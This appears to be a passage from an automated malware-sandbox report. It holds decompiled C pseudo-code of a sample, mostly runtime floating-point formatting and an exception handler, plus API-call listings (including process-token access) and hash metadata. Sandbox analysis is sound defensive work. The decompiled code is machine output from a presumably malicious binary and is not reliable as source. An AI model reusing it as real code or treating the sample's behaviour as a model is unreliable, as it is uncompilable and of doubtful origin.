      				_v112 = _t449;
      				if(_t449 == 0) {
      					_t433[0] = 0x20;
      				} else {
      					_t433[0] = 0x2d;
      				}
      				_t582 = _v16;
      				_t562 = _v20;
      				if(_t499 != 0 || _t582 != 0 || _t562 != 0) {
      					__eflags = _t499 - 0x7fff;
      					if(_t499 != 0x7fff) {
      						_t452 = (((_t499 & 0x0000ffff) >> 0x00000008) + (_t582 >> 0x00000018) * 0x00000002) * 0x0000004d + (_t499 & 0x0000ffff) * 0x00004d10 - 0x134312f4 >> 0x00000010 & 0x0000ffff;
      						_v80 = _t452;
      						_t376 = 0;
      						_t437 =  ~_t452;
      						__eflags = _t437;
      						_v26 = _t499;
      						_v30 = _t582;
      						_v34 = _t562;
      						_v36 = 0;
      						_v108 = 0x42ccd0;
      						if(__eflags == 0) {
      							L85:
      							_t456 = _v28 >> 0x10;
      							__eflags = _t456 - 0x3fff;
      							if(_t456 < 0x3fff) {
      								L136:
      								__eflags = _a20 & 0x00000001;
      								_t499 = _v100;
      								_t457 = _v80;
      								 *_t499 = _t457;
      								if((_a20 & 0x00000001) == 0) {
      									L139:
      									_t458 = 0x15;
      									__eflags = _a16 - _t458;
      									if(_a16 > _t458) {
      										_a16 = _t458;
      									}
      									_t582 = (_v28 >> 0x10) - 0x3ffe;
      									__eflags = _t582;
      									_v26 = _t376;
      									_t439 = 8;
      									do {
      										_v36 = _v36 << 1;
      										_t562 = _v32 + _v32 | _v36 >> 0x0000001f;
      										_t439 = _t439 - 1;
      										__eflags = _t439;
      										_v32 = _v32 + _v32 | _v36 >> 0x0000001f;
      										_v28 = _v28 + _v28 | _v32 >> 0x0000001f;
      									} while (_t439 != 0);
      									__eflags = _t582;
      									if(_t582 >= 0) {
      										L146:
      										_t383 = _a16 + 1;
      										__eflags = _t383;
      										_t440 = _t499 + 4;
      										_v68 = _t440;
      										_v80 = _t383;
      										if(_t383 <= 0) {
      											L158:
      											_t441 = _t440 - 1;
      											_t442 = _t441 - 1;
      											__eflags =  *_t441 - 0x35;
      											if( *_t441 >= 0x35) {
      												while(1) {
      													__eflags = _t442 - _v68;
      													if(_t442 < _v68) {
      														break;
      													}
      													__eflags =  *_t442 - 0x39;
      													if( *_t442 != 0x39) {
      														break;
      													}
      													 *_t442 = 0x30;
      													_t442 = _t442 - 1;
      													__eflags = _t442;
      												}
      												__eflags = _t442 - _v68;
      												_t385 = _v100;
      												if(_t442 < _v68) {
      													_t442 = _t442 + 1;
      													 *_t385 =  *_t385 + 1;
      													__eflags =  *_t385;
      												}
      												 *_t442 =  *_t442 + 1;
      												__eflags =  *_t442;
      												L166:
      												_t442 = _t442 - _t385 - 3;
      												__eflags = _t442;
      												_t385[1] = _t442;
      												 *((char*)( &(_t385[2]) + _t442)) = 0;
      												_t386 = _v120;
      												goto L167;
      											}
      											_t464 = _v68;
      											while(1) {
      												__eflags = _t442 - _t464;
      												if(_t442 < _t464) {
      													break;
      												}
      												__eflags =  *_t442 - 0x30;
      												if( *_t442 != 0x30) {
      													break;
      												}
      												_t442 = _t442 - 1;
      												__eflags = _t442;
      											}
      											__eflags = _t442 - _t464;
      											_t385 = _v100;
      											if(_t442 >= _t464) {
      												goto L166;
      											}
      											 *_t385 =  *_t385 & 0x00000000;
      											__eflags = _v112 - 0x8000;
      											_t385[1] = 1;
      											_t385[1] = _t499;
      											 *_t464 = 0x30;
      											_t385[2] = 0;
      											goto L7;
      										} else {
      											goto L147;
      										}
      										do {
      											L147:
      											_t389 = _v32;
      											asm("movsd");
      											asm("movsd");
      											asm("movsd");
      											_v36 = _v36 << 1;
      											_v36 = _v36 << 1;
      											_t466 = _t389 + _t389 | _v36 >> 0x0000001f;
      											_t508 = _v64;
      											_t468 = (_v28 + _v28 | _t389 >> 0x0000001f) + (_v28 + _v28 | _t389 >> 0x0000001f) | _t466 >> 0x0000001f;
      											_t392 = _v36;
      											_t589 = _t466 + _t466 | _v36 >> 0x0000001f;
      											_t562 = _t508 + _t392;
      											__eflags = _t562 - _t392;
      											if(_t562 < _t392) {
      												L149:
      												_t393 = _t589 + 1;
      												_t509 = 0;
      												__eflags = _t393 - _t589;
      												if(_t393 < _t589) {
      													L151:
      													_t509 = 1;
      													__eflags = 1;
      													L152:
      													__eflags = _t509;
      													_t589 = _t393;
      													if(_t509 != 0) {
      														_t468 = _t468 + 1;
      														__eflags = _t468;
      													}
      													L154:
      													_t394 = _v60;
      													_t511 = _t394 + _t589;
      													__eflags = _t511 - _t589;
      													_v72 = _t511;
      													if(_t511 < _t589) {
      														L156:
      														_t468 = _t468 + 1;
      														__eflags = _t468;
      														goto L157;
      													}
      													__eflags = _t511 - _t394;
      													if(_t511 >= _t394) {
      														goto L157;
      													}
      													goto L156;
      												}
      												__eflags = _t393 - 1;
      												if(_t393 >= 1) {
      													goto L152;
      												}
      												goto L151;
      											}
      											__eflags = _t562 - _t508;
      											if(_t562 >= _t508) {
      												goto L154;
      											}
      											goto L149;
      											L157:
      											_t499 = _t511 >> 0x1f;
      											_t471 = _t468 + _v56 + _t468 + _v56 | _t499;
      											_v36 = _t562 + _t562;
      											_t591 = _v72;
      											_v28 = _t471;
      											_t582 = _v72 + _t591 | _t562 >> 0x0000001f;
      											 *_t440 = (_t471 >> 0x18) + 0x30;
      											_t440 = _t440 + 1;
      											_v80 = _v80 - 1;
      											__eflags = _v80;
      											_v32 = _v72 + _t591 | _t562 >> 0x0000001f;
      											_v25 = 0;
      										} while (_v80 > 0);
      										goto L158;
      									}
      									_t582 =  ~_t582 & 0x000000ff;
      									__eflags = _t582;
      									if(_t582 <= 0) {
      										goto L146;
      									} else {
      										goto L145;
      									}
      									do {
      										L145:
      										_v28 = _v28 >> 1;
      										_t562 = _v32 >> 0x00000001 | _v28 << 0x0000001f;
      										_t582 = _t582 - 1;
      										__eflags = _t582;
      										_v32 = _v32 >> 0x00000001 | _v28 << 0x0000001f;
      										_v36 = _v36 >> 0x00000001 | _v32 << 0x0000001f;
      									} while (_t582 > 0);
      									goto L146;
      								}
      								_a16 = _a16 + _t457;
      								__eflags = _a16 - _t376;
      								if(_a16 > _t376) {
      									goto L139;
      								}
      								 *_t499 =  *_t499 & 0x00000000;
      								__eflags = _v112 - 0x8000;
      								 *((char*)(_t499 + 3)) = 1;
      								 *((char*)(_t499 + 2)) = ((_t376 & 0xffffff00 | _v112 != 0x00008000) - 0x00000001 & 0x0000000d) + 0x20;
      								 *(_t499 + 4) = 0x30;
      								 *((char*)(_t499 + 5)) = 0;
      								goto L7;
      							}
      							_t594 = _v42;
      							_v80 = _v80 + 1;
      							_t512 = _t456 & 0x0000ffff;
      							_t513 = _t512 & 0x00007fff;
      							_t582 = _t594 & 0x00007fff;
      							_t479 = (_t594 ^ _t512) & 0x00008000;
      							__eflags = _t513 - 0x7fff;
      							_v92 = _t376;
      							_v20 = _t376;
      							_v16 = _t376;
      							_v12 = _t376;
      							_t562 = _t582 + _t513 & 0x0000ffff;
      							if(_t513 >= 0x7fff) {
      								L134:
      								asm("sbb ecx, ecx");
      								_t482 = ( ~_t479 & 0x80000000) + 0x7fff8000;
      								__eflags = _t482;
      								_v28 = _t482;
      								L135:
      								_v32 = _t376;
      								_v36 = _t376;
      								goto L136;
      							}
      							__eflags = _t582 - 0x7fff;
      							if(_t582 >= 0x7fff) {
      								goto L134;
      							}
      							__eflags = _t562 - 0xbffd;
      							if(_t562 > 0xbffd) {
      								goto L134;
      							}
      							__eflags = _t562 - 0x3fbf;
      							if(_t562 > 0x3fbf) {
      								__eflags = _t513 - _t376;
      								if(_t513 != _t376) {
      									L96:
      									__eflags = _t582 - _t376;
      									if(_t582 != _t376) {
      										L100:
      										_t195 =  &_v88;
      										 *_t195 = _v88 & 0x00000000;
      										__eflags =  *_t195;
      										_t406 =  &_v16;
      										_v68 = 5;
      										do {
      											_t582 = _v68;
      											_t515 = _v88 + _v88;
      											__eflags = _t582;
      											_v84 = _t582;
      											if(_t582 <= 0) {
      												goto L109;
      											}
      											_v96 =  &_v44;
      											_v76 = _t605 + _t515 - 0x20;
      											do {
      												_v72 = _v72 & 0x00000000;
      												_t531 = ( *_v96 & 0x0000ffff) * ( *_v76 & 0x0000ffff);
      												_t582 =  *(_t406 - 4);
      												_t442 = _t582 + _t531;
      												__eflags = _t442 - _t582;
      												if(_t442 < _t582) {
      													L105:
      													_v72 = 1;
      													goto L106;
      												}
      												__eflags = _t442 - _t531;
      												if(_t442 >= _t531) {
      													goto L106;
      												}
      												goto L105;
      												L106:
      												__eflags = _v72;
      												 *(_t406 - 4) = _t442;
      												if(_v72 != 0) {
      													 *_t406 =  *_t406 + 1;
      													__eflags =  *_t406;
      												}
      												_v76 = _v76 + 2;
      												_v96 = _v96 - 2;
      												_v84 = _v84 - 1;
      												__eflags = _v84;
      											} while (_v84 > 0);
      											L109:
      											_t406 =  &(_t406[1]);
      											_v88 =  &(_v88[0]);
      											_v68 = _v68 - 1;
      											__eflags = _v68;
      										} while (_v68 > 0);
      										_t571 = _t562 + 0xc002;
      										_t408 = 0;
      										__eflags = _t571;
      										if(_t571 <= 0) {
      											L114:
      											_t562 = _t571 + 0xffff;
      											__eflags = _t562 - _t408;
      											if(_t562 >= _t408) {
      												L121:
      												__eflags = _v20 - 0x8000;
      												if(_v20 > 0x8000) {
      													L123:
      													__eflags = _v18 - 0xffffffff;
      													if(_v18 != 0xffffffff) {
      														_t267 =  &_v18;
      														 *_t267 = _v18 + 1;
      														__eflags =  *_t267;
      													} else {
      														__eflags = _v14 - 0xffffffff;
      														_v18 = _t408;
      														if(_v14 != 0xffffffff) {
      															_v14 = _v14 + 1;
      														} else {
      															__eflags = _v10 - 0xffff;
      															_v14 = _t408;
      															if(_v10 != 0xffff) {
      																_v10 = _v10 + 1;
      															} else {
      																_v10 = 0x8000;
      																_t562 = _t562 + 1;
      															}
      														}
      													}
      													L130:
      													__eflags = _t562 - 0x7fff;
      													if(_t562 < 0x7fff) {
      														_v36 = _v18;
      														_v34 = _v16;
      														_t562 = _t562 | _t479;
      														_v30 = _v12;
      														_v26 = _t562;
      													} else {
      														_v32 = _t408;
      														_v36 = _t408;
      														asm("sbb ecx, ecx");
      														_t485 = ( ~_t479 & 0x80000000) + 0x7fff8000;
      														__eflags = _t485;
      														_v28 = _t485;
      													}
      													_t376 = 0;
      													goto L136;
      												}
      												__eflags = (_v20 & 0x0001ffff) - 0x18000;
      												if((_v20 & 0x0001ffff) != 0x18000) {
      													goto L130;
      												}
      												goto L123;
      											}
      											_t414 =  ~_t562 & 0x0000ffff;
      											_t562 = _t562 + _t414;
      											__eflags = _t562;
      											do {
      												__eflags = _v20 & 0x00000001;
      												if((_v20 & 0x00000001) != 0) {
      													_t242 =  &_v92;
      													 *_t242 = _v92 + 1;
      													__eflags =  *_t242;
      												}
      												_v12 = _v12 >> 1;
      												_t442 = _v16 >> 0x00000001 | _v12 << 0x0000001f;
      												_t582 = _v16 << 0x1f;
      												_t414 = _t414 - 1;
      												__eflags = _t414;
      												_v16 = _v16 >> 0x00000001 | _v12 << 0x0000001f;
      												_v20 = _v20 >> 0x00000001 | _v16 << 0x0000001f;
      											} while (_t414 != 0);
      											_t408 = 0;
      											__eflags = _v92;
      											if(_v92 != 0) {
      												_t253 =  &_v20;
      												 *_t253 = _v20 | 0x00000001;
      												__eflags =  *_t253;
      											}
      											goto L121;
      										} else {
      											goto L111;
      										}
      										while(1) {
      											L111:
      											__eflags = _v12 & 0x80000000;
      											if((_v12 & 0x80000000) != 0) {
      												break;
      											}
      											_t446 = _v16;
      											_v20 = _v20 << 1;
      											_t442 = _v16 + _t446 | _v20 >> 0x0000001f;
      											_t582 = _v16 >> 0x1f;
      											_t571 = _t571 + 0xffff;
      											__eflags = _t571 - _t408;
      											_v16 = _v16 + _t446 | _v20 >> 0x0000001f;
      											_v12 = _v12 + _v12 | _v16 >> 0x0000001f;
      											if(_t571 > _t408) {
      												continue;
      											}
      											break;
      										}
      										__eflags = _t571 - _t408;
      										if(_t571 > _t408) {
      											goto L121;
      										}
      										goto L114;
      									}
      									_t562 = _t562 + 1;
      									__eflags = _v44 & 0x7fffffff;
      									if((_v44 & 0x7fffffff) != 0) {
      										goto L100;
      									}
      									__eflags = _v48 - _t376;
      									if(_v48 != _t376) {
      										goto L100;
      									}
      									__eflags = _v52 - _t376;
      									if(_v52 == _t376) {
      										goto L90;
      									}
      									goto L100;
      								}
      								_t562 = _t562 + 1;
      								__eflags = _v28 & 0x7fffffff;
      								if((_v28 & 0x7fffffff) != 0) {
      									goto L96;
      								}
      								__eflags = _v32 - _t376;
      								if(_v32 != _t376) {
      									goto L96;
      								}
      								__eflags = _v36 - _t376;
      								if(_v36 != _t376) {
      									goto L96;
      								}
      								_v26 = _t376;
      								goto L136;
      							}
      							L90:
      							_v28 = _t376;
      							goto L135;
      						}
      						if(__eflags < 0) {
      							_t437 =  ~_t437;
      							__eflags = 0x42ce90;
      							_v108 = 0x42ce30;
      						}
      						__eflags = _t437 - _t376;
      						if(_t437 != _t376) {
      							do {
      								_v108 = _v108 + 0x54;
      								_t487 = _t437 & 0x00000007;
      								_t437 = _t437 >> 3;
      								__eflags = _t487;
      								if(_t487 == 0) {
      									goto L83;
      								}
      								_t489 = _t487 * 0xc + _v108;
      								__eflags =  *_t489 - 0x8000;
      								_v104 = _t489;
      								if( *_t489 >= 0x8000) {
      									asm("movsd");
      									asm("movsd");
      									_t418 =  &_v64;
      									asm("movsd");
      									_t54 =  &_v62;
      									 *_t54 = _v62 - 1;
      									__eflags =  *_t54;
      									_v104 = _t418;
      									_t489 = _t418;
      								}
      								_t572 =  *(_t489 + 0xa) & 0x0000ffff;
      								_t532 = _v26;
      								_t582 = 0x7fff;
      								_t533 = _t532 & 0x00007fff;
      								_t562 = _t572 & 0x00007fff;
      								_v76 = 0;
      								_v20 = 0;
      								_v16 = 0;
      								_v12 = 0;
      								_t492 = (_t572 ^ _t532) & 0x00008000;
      								__eflags = _t533 - 0x7fff;
      								_t417 = _t562 + _t533 & 0x0000ffff;
      								if(_t533 >= 0x7fff) {
      									L82:
      									asm("sbb ecx, ecx");
      									_v32 = _v32 & 0x00000000;
      									_t171 =  &_v36;
      									 *_t171 = _v36 & 0x00000000;
      									__eflags =  *_t171;
      									_v28 = ( ~_t492 & 0x80000000) + 0x7fff8000;
      								} else {
      									__eflags = _t562 - 0x7fff;
      									if(_t562 >= 0x7fff) {
      										goto L82;
      									}
      									__eflags = _t417 - 0xbffd;
      									if(_t417 > 0xbffd) {
      										goto L82;
      									}
      									__eflags = _t417 - 0x3fbf;
      									if(_t417 > 0x3fbf) {
      										_t582 = 0;
      										__eflags = _t533;
      										if(_t533 != 0) {
      											L45:
      											__eflags = _t562 - _t582;
      											if(_t562 != _t582) {
      												L50:
      												_t574 =  &_v16;
      												_v96 = _t582;
      												_v72 = _t574;
      												_v68 = 5;
      												do {
      													_t582 = _v68;
      													_t535 = _v96 + _v96;
      													__eflags = _t582;
      													_v84 = _t582;
      													if(_t582 <= 0) {
      														goto L59;
      													}
      													_v92 = _t605 + _t535 - 0x20;
      													_t556 = _v104 + 8;
      													__eflags = _t556;
      													_v88 = _t556;
      													do {
      														_t576 =  *(_t574 - 4);
      														_t559 = ( *_v92 & 0x0000ffff) * ( *_v88 & 0x0000ffff);
      														_v116 = _v116 & 0x00000000;
      														_t582 = _t576 + _t559;
      														__eflags = _t582 - _t576;
      														if(_t582 < _t576) {
      															L55:
      															_v116 = 1;
      															goto L56;
      														}
      														__eflags = _t582 - _t559;
      														if(_t582 >= _t559) {
      															goto L56;
      														}
      														goto L55;
      														L56:
      														__eflags = _v116;
      														_t574 = _v72;
      														 *(_t574 - 4) = _t582;
      														if(_v116 != 0) {
      															 *_t574 =  *_t574 + 1;
      															__eflags =  *_t574;
      														}
      														_v92 = _v92 + 2;
      														_v88 = _v88 - 2;
      														_v84 = _v84 - 1;
      														__eflags = _v84;
      													} while (_v84 > 0);
      													L59:
      													_t574 = _t574 + 2;
      													_v96 = _v96 + 1;
      													_v68 = _v68 - 1;
      													__eflags = _v68;
      													_v72 = _t574;
      												} while (_v68 > 0);
      												_t419 = _t417 + 0xc002;
      												__eflags = _t419;
      												if(_t419 <= 0) {
      													L64:
      													_t419 = _t419 + 0xffff;
      													__eflags = _t419;
      													if(_t419 >= 0) {
      														L71:
      														__eflags = _v20 - 0x8000;
      														if(_v20 > 0x8000) {
      															L73:
      															__eflags = _v18 - 0xffffffff;
      															if(_v18 != 0xffffffff) {
      																_t160 =  &_v18;
      																 *_t160 = _v18 + 1;
      																__eflags =  *_t160;
      															} else {
      																_v18 = _v18 & 0x00000000;
      																__eflags = _v14 - 0xffffffff;
      																if(_v14 != 0xffffffff) {
      																	_v14 = _v14 + 1;
      																} else {
      																	_v14 = _v14 & 0x00000000;
      																	__eflags = _v10 - 0xffff;
      																	if(_v10 != 0xffff) {
      																		_v10 = _v10 + 1;
      																	} else {
      																		_v10 = 0x8000;
      																		_t419 = _t419 + 1;
      																	}
      																}
      															}
      															L80:
      															__eflags = _t419 - 0x7fff;
      															if(_t419 >= 0x7fff) {
      																goto L82;
      															}
      															_v36 = _v18;
      															_v34 = _v16;
      															_v30 = _v12;
      															_v26 = _t419 | _t492;
      															goto L83;
      														}
      														__eflags = (_v20 & 0x0001ffff) - 0x18000;
      														if((_v20 & 0x0001ffff) != 0x18000) {
      															goto L80;
      														}
      														goto L73;
      													}
      													_t543 =  ~_t419 & 0x0000ffff;
      													_v72 = _t543;
      													_t419 = _t419 + _t543;
      													__eflags = _t419;
      													do {
      														__eflags = _v20 & 0x00000001;
      														if((_v20 & 0x00000001) != 0) {
      															_t131 =  &_v76;
      															 *_t131 = _v76 + 1;
      															__eflags =  *_t131;
      														}
      														_v12 = _v12 >> 1;
      														_t562 = _v16 >> 0x00000001 | _v12 << 0x0000001f;
      														_t582 = _v16 << 0x1f;
      														_t139 =  &_v72;
      														 *_t139 = _v72 - 1;
      														__eflags =  *_t139;
      														_v16 = _v16 >> 0x00000001 | _v12 << 0x0000001f;
      														_v20 = _v20 >> 0x00000001 | _v16 << 0x0000001f;
      													} while ( *_t139 != 0);
      													__eflags = _v76;
      													if(_v76 != 0) {
      														_t144 =  &_v20;
      														 *_t144 = _v20 | 0x00000001;
      														__eflags =  *_t144;
      													}
      													goto L71;
      												} else {
      													goto L61;
      												}
      												while(1) {
      													L61:
      													__eflags = _v12 & 0x80000000;
      													if((_v12 & 0x80000000) != 0) {
      														break;
      													}
      													_t579 = _v16;
      													_v20 = _v20 << 1;
      													_t562 = _v16 + _t579 | _v20 >> 0x0000001f;
      													_t582 = _v16 >> 0x1f;
      													_t419 = _t419 + 0xffff;
      													__eflags = _t419;
      													_v16 = _v16 + _t579 | _v20 >> 0x0000001f;
      													_v12 = _v12 + _v12 | _v16 >> 0x0000001f;
      													if(_t419 > 0) {
      														continue;
      													}
      													break;
      												}
      												__eflags = _t419;
      												if(_t419 > 0) {
      													goto L71;
      												}
      												goto L64;
      											}
      											_t560 = _v104;
      											_t417 = _t417 + 1;
      											__eflags =  *(_t560 + 8) & 0x7fffffff;
      											if(( *(_t560 + 8) & 0x7fffffff) != 0) {
      												goto L50;
      											}
      											__eflags =  *((intOrPtr*)(_t560 + 4)) - _t582;
      											if( *((intOrPtr*)(_t560 + 4)) != _t582) {
      												goto L50;
      											}
      											__eflags =  *_t560 - _t582;
      											if( *_t560 != _t582) {
      												goto L50;
      											}
      											_v28 = _t582;
      											_v32 = _t582;
      											_v36 = _t582;
      											goto L83;
      										}
      										_t417 = _t417 + 1;
      										__eflags = _v28 & 0x7fffffff;
      										if((_v28 & 0x7fffffff) != 0) {
      											goto L45;
      										}
      										__eflags = _v32;
      										if(_v32 != 0) {
      											goto L45;
      										}
      										__eflags = _v36;
      										if(_v36 != 0) {
      											goto L45;
      										}
      										_v26 = 0;
      										goto L83;
      									}
      									_v28 = 0;
      									_v32 = 0;
      									_v36 = 0;
      								}
      								L83:
      								__eflags = _t437;
      							} while (_t437 != 0);
      							_t376 = 0;
      							__eflags = 0;
      						}
      						goto L85;
      					}
      					__eflags = _t582 - 0x80000000;
      					 *_t433 = 1;
      					if(_t582 != 0x80000000) {
      						L11:
      						__eflags = _t582 & 0x40000000;
      						if((_t582 & 0x40000000) != 0) {
      							L13:
      							__eflags = _t449;
      							if(_t449 == 0) {
      								L17:
      								__eflags = _t582 - 0x80000000;
      								if(_t582 != 0x80000000) {
      									L23:
      									_push("1#QNAN");
      									goto L24;
      								}
      								__eflags = _t562;
      								if(_t562 != 0) {
      									goto L23;
      								} else {
      									_push("1#INF");
      									L20:
      									_push(0x16);
      									_push( &(_t433[1]));
      									_t427 = E0040D0F8(_t499);
      									_t582 = 0;
      									__eflags = _t427;
      									if(__eflags != 0) {
      										_push(0);
      										_push(0);
      										_push(0);
      										_push(0);
      										_push(0);
      										E0040CA26(_t433, _t449, _t499, _t562, __eflags);
      									}
      									_t433[0] = 5;
      									goto L27;
      								}
      							}
      							__eflags = _t582 - 0xc0000000;
      							if(_t582 != 0xc0000000) {
      								goto L17;
      							}
      							__eflags = _t562;
      							if(_t562 != 0) {
      								goto L23;
      							} else {
      								_push("1#IND");
      								goto L20;
      							}
      						} else {
      							_push("1#SNAN");
      							L24:
      							_push(0x16);
      							_push( &(_t433[1]));
      							_t424 = E0040D0F8(_t499);
      							_t582 = 0;
      							__eflags = _t424;
      							if(__eflags != 0) {
      								_push(0);
      								_push(0);
      								_push(0);
      								_push(0);
      								_push(0);
      								E0040CA26(_t433, _t449, _t499, _t562, __eflags);
      							}
      							_t433[0] = 6;
      							L27:
      							_t386 = 0;
      							goto L167;
      						}
      					}
      					__eflags = _t562;
      					if(_t562 == 0) {
      						goto L13;
      					}
      					goto L11;
      				} else {
      					 *_t433 =  *_t433 & _t562;
      					_t433[0] = ((0x8000 | _t449 != 0x00008000) - 0x00000001 & 0x0000000d) + 0x20;
      					_t433[0] = 1;
      					_t433[1] = 0x30;
      					_t433[1] = 0;
      					L7:
      					_t386 = 1;
      					L167:
      					return E0040FE9A(_t386, _t442, _v8 ^ _t605, _t499, _t562, _t582);
      				}
      			}
      0x0041560e
      0x0041560e
      0x0041560e
      0x00415616
      0x00415616
      0x00415616
      0x00000000
      0x0041537b
      0x00415280
      0x00415282
      0x00415287
      0x0041528d
      0x0041528d
      0x00415293
      0x0041529c
      0x0041529c
      0x0041529f
      0x004152b4
      0x004152b4
      0x004152b6
      0x004152e8
      0x004152e8
      0x00000000
      0x004152e8
      0x004152b8
      0x004152ba
      0x00000000
      0x004152bc
      0x004152bc
      0x004152c1
      0x004152c4
      0x004152c6
      0x004152c7
      0x004152cf
      0x004152d1
      0x004152d3
      0x004152d5
      0x004152d6
      0x004152d7
      0x004152d8
      0x004152d9
      0x004152da
      0x004152df
      0x004152e2
      0x00000000
      0x004152e2
      0x004152ba
      0x004152a1
      0x004152a7
      0x00000000
      0x00000000
      0x004152a9
      0x004152ab
      0x00000000
      0x004152ad
      0x004152ad
      0x00000000
      0x004152ad
      0x00415295
      0x00415295
      0x004152ed
      0x004152f0
      0x004152f2
      0x004152f3
      0x004152fb
      0x004152fd
      0x004152ff
      0x00415301
      0x00415302
      0x00415303
      0x00415304
      0x00415305
      0x00415306
      0x0041530b
      0x0041530e
      0x00415312
      0x00415312
      0x00000000
      0x00415312
      0x00415293
      0x00415289
      0x0041528b
      0x00000000
      0x00000000
      0x00000000
      0x0041524a
      0x0041524a
      0x00415259
      0x0041525c
      0x00415260
      0x00415264
      0x00415268
      0x0041526a
      0x00415a39
      0x00415a47
      0x00415a47

      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?$T
      • API String ID: 2579439406-1230703744
      • Opcode ID: 0397ba9497dfe9a272f1a4ea60a6fb9a6a80abc0acaa5cf51831150090fa09ea
      • Instruction ID: 12636c6aad61654a31321d8f4daf5862cc437256b8386b6844a03c684cf31645
      • Opcode Fuzzy Hash: 0397ba9497dfe9a272f1a4ea60a6fb9a6a80abc0acaa5cf51831150090fa09ea
      • Instruction Fuzzy Hash: FB529E71D00A5ACBDF24CF98C4802EEB7B2FF94314F54826BC855AB385D7785982CB99
      APIs
      • NtOpenProcess.NTDLL(00000000,00000400,?,002D1F56), ref: 002D465C
      • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 002D466F
      • NtClose.NTDLL(00000000), ref: 002D46D1
        • Part of subcall function 002D1000: RtlAllocateHeap.NTDLL(00000000,?,002D4CB5), ref: 002D100C
      • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002D46B5
        • Part of subcall function 002D1015: HeapFree.KERNEL32(00000000,?,002D46C4), ref: 002D1021
      • NtClose.NTDLL(?), ref: 002D46C7
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: CloseHeapOpenProcess$AllocateFreeTokenmemcpy
      • String ID:
      • API String ID: 2190824854-0
      • Opcode ID: 4276a668cd0254d6ec7413a328b1bccc1982e4dad0e9b474e62d1055d120c967
      • Instruction ID: b8c03303290e4645f0c9e0c967a2c01f51494ab26572f5f0c88120217e21f09b
      • Opcode Fuzzy Hash: 4276a668cd0254d6ec7413a328b1bccc1982e4dad0e9b474e62d1055d120c967
      • Instruction Fuzzy Hash: 4C210572910229BBDB01AF95DC45EDEBFBDEB08741F104026F905F6260E7718A949FA1
      C-Code - Quality: 76%
      			E0040CA26(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, void* __eflags) {
      				void* __esi;
      				signed int _t32;
      				signed int _t33;
      				intOrPtr _t34;
      				int _t45;
      				intOrPtr _t55;
      				intOrPtr _t56;
      				int _t57;
      				intOrPtr _t58;
      				signed int _t59;
      				void* _t61;
      
      				_t54 = __edi;
      				_t53 = __edx;
      				_t48 = __ebx;
      				_t59 = _t61 - 0x2a8;
      				_t32 =  *0x42c4a0; // 0xe190ffa3
      				_t33 = _t32 ^ _t59;
      				 *(_t59 + 0x2a4) = _t33;
      				_push(_t55);
      				 *(_t59 + 0x88) = _t33;
      				 *((intOrPtr*)(_t59 + 0x84)) = __ecx;
      				 *((intOrPtr*)(_t59 + 0x80)) = __edx;
      				 *((intOrPtr*)(_t59 + 0x7c)) = __ebx;
      				 *((intOrPtr*)(_t59 + 0x78)) = _t55;
      				 *((intOrPtr*)(_t59 + 0x74)) = __edi;
      				 *((intOrPtr*)(_t59 + 0xa0)) = ss;
      				 *((intOrPtr*)(_t59 + 0x94)) = cs;
      				 *((intOrPtr*)(_t59 + 0x70)) = ds;
      				 *((intOrPtr*)(_t59 + 0x6c)) = es;
      				 *((intOrPtr*)(_t59 + 0x68)) = fs;
      				 *((intOrPtr*)(_t59 + 0x64)) = gs;
      				asm("pushfd");
      				_pop( *_t15);
      				_t56 =  *((intOrPtr*)(_t59 + 0x2ac));
      				_t34 = _t59 + 0x2ac;
      				 *((intOrPtr*)(_t59 + 0x9c)) = _t34;
      				 *((intOrPtr*)(_t59 - 0x28)) = 0x10001;
      				 *((intOrPtr*)(_t59 + 0x90)) = _t56;
      				 *((intOrPtr*)(_t59 + 0x8c)) =  *((intOrPtr*)(_t34 - 4));
      				E0040FE20(__edi, _t59 - 0x80, 0, 0x50);
      				 *(_t59 - 0x30) = _t59 - 0x80;
      				 *(_t59 - 0x80) = 0xc000000d;
      				 *((intOrPtr*)(_t59 - 0x74)) = _t56;
      				 *((intOrPtr*)(_t59 - 0x2c)) = _t59 - 0x28;
      				_t57 = IsDebuggerPresent();
      				SetUnhandledExceptionFilter(0);
      				if(UnhandledExceptionFilter(_t59 - 0x30) == 0 && _t57 == 0) {
      					_push(2);
      					E0040FE17(_t43);
      				}
      				_t45 = TerminateProcess(GetCurrentProcess(), 0xc000000d);
      				_pop(_t58);
      				return E0040FE9A(_t45, _t48,  *(_t59 + 0x2a4) ^ _t59, _t53, _t54, _t58);
      			}















      APIs
      • IsDebuggerPresent.KERNEL32(?,?,0040EEF7), ref: 0040CAD0
      • SetUnhandledExceptionFilter.KERNEL32 ref: 0040CADA
      • UnhandledExceptionFilter.KERNEL32(?), ref: 0040CAE4
      • GetCurrentProcess.KERNEL32(C000000D,?,?,0040EEF7), ref: 0040CAFF
      • TerminateProcess.KERNEL32(00000000,?,?,0040EEF7), ref: 0040CB06
        • Part of subcall function 0040FE9A: IsDebuggerPresent.KERNEL32 ref: 00412B08
        • Part of subcall function 0040FE9A: SetUnhandledExceptionFilter.KERNEL32 ref: 00412B1D
        • Part of subcall function 0040FE9A: UnhandledExceptionFilter.KERNEL32(fC), ref: 00412B28
        • Part of subcall function 0040FE9A: GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
        • Part of subcall function 0040FE9A: TerminateProcess.KERNEL32(00000000), ref: 00412B4B
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
